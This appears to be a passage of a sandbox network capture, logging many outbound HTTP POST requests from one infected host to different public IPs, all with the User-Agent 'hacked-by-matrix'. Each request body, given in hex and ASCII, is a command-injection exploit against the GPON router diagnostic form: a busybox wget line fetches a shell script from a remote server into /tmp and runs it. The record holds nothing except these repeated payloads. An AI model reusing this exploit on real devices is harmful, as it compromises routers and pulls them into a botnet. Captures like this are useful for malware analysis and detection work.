                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2172192.168.2.1353314109.16.238.114443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.887820005 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2173192.168.2.13431465.51.225.16443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.887824059 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2174192.168.2.1354430109.44.50.2443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.887834072 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2175192.168.2.134517842.138.136.126443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.887835026 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2176192.168.2.1348766109.19.83.15443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.887861967 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2177192.168.2.1336840109.72.219.109443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.887862921 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2178192.168.2.1344728109.87.140.133443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.887896061 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2179192.168.2.1358792109.240.69.148443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.887929916 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2180192.168.2.13335765.33.46.73443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.887934923 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2181192.168.2.133448042.209.0.231443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.887954950 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2182192.168.2.1334382212.82.58.87443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.887957096 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2183192.168.2.1357438118.22.189.100443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.887972116 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2184192.168.2.13504285.231.24.160443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.887976885 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2185192.168.2.1354934118.116.38.119443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.888000965 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2186192.168.2.1333922118.98.19.91443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.888012886 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2187192.168.2.1350092212.123.163.85443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.888041973 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2188192.168.2.1352062109.54.119.76443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.888041973 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2189192.168.2.1342102118.128.108.66443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.888047934 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2190192.168.2.1334966212.109.161.52443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.888076067 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2191192.168.2.1348028118.192.180.137443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.888084888 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2192192.168.2.1348486118.50.244.138443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.888084888 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2193192.168.2.134506242.90.236.237443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.888094902 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2194192.168.2.1346408109.168.82.202443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.888118982 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
